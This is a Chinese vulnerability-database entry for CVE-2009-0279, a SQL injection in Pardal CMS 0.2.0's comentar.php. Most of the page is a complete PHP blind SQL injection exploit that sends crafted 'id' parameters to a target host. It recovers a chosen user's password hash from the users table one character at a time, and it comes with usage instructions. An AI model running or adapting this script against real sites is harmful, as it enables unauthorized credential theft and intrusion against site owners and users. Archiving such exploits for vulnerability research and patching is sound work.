Pardal CMS 'comentar.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117275 漏洞类型 SQL注入
发布时间 2009-01-22 更新时间 2009-01-27
CVE编号 CVE-2009-0279 CNNVD-ID CNNVD-200901-355
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7851
https://cxsecurity.com/issue/WLB-2009010214
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-355
|漏洞详情
PardalCMS0.2.0及之前版本中的comentar.php存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
--+++=============================================================+++--
--+++====== Pardal CMS <= 0.2.0 Blind SQL Injection Exploit ======+++--
--+++=============================================================+++--

<?php

function usage ()
{
    echo "\nPardal CMS <= 0.2.0 Blind SQL Injection Exploit".
         "\n[+] Author  : darkjoker".
         "\n[+] Site    : http://darkjoker.net23.net".
         "\n[+] Download: http://tinyurl.com/csg4vt".
         "\n[+] Usage   : php xpl.php <hostname> <path> <username>".
         "\n[+] Ex.     : php xpl.php localhost /PardalCMS Admin".
         "\n\n";
    exit ();
}


function query ($user, $chr, $pos)
{
    $query = "x' OR ASCII(SUBSTRING((SELECT senha FROM users WHERE login = '{$user}'),{$pos},1))='{$chr}";
    $query = str_replace (" ", "%20", $query);
    $query = str_replace ("'", "%27", $query);
    return $query;
}

function exploit ($hostname, $path, $user, $pos, $chr)
{
    $chr = ord ($chr);
    $fp = fsockopen ($hostname, 80);
    $query = query ($user, $chr, $pos);
    $request = "GET {$path}/comentar.php?id={$query} HTTP/1.1\r\n".
           "Host: {$hostname}\r\n".
           "Connection: Close\r\n\r\n";
    
    fputs ($fp, $request);
    while (!feof ($fp))
        $reply .= fgets ($fp, 1024);
    
    fclose ($fp);

    if (preg_match ("/\"#FFFFFF\"> em <\/font>/", $reply))
        return false;
    else
        return true;
}

if ($argc != 4)
    usage ();

$hostname = $argv [1];
$path = $argv [2];
$username = $argv [3];
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;

echo "[+] Password: ";

while ($pos <= 32)
{
    if (exploit ($hostname, $path, $username, $pos, $key [$chr]))
    {
        echo $key [$chr];
        $chr = 0;
        $pos++;
    }
    else
        $chr++;
}

echo "\n\n";

?>

# milw0rm.com [2009-01-22]
|参考资料

来源:XF
名称:pardalcms-comentar-sql-injection(48175)
链接:http://xforce.iss.net/xforce/xfdb/48175
来源:BID
名称:33404
链接:http://www.securityfocus.com/bid/33404
来源:MILW0RM
名称:7851
链接:http://www.milw0rm.com/exploits/7851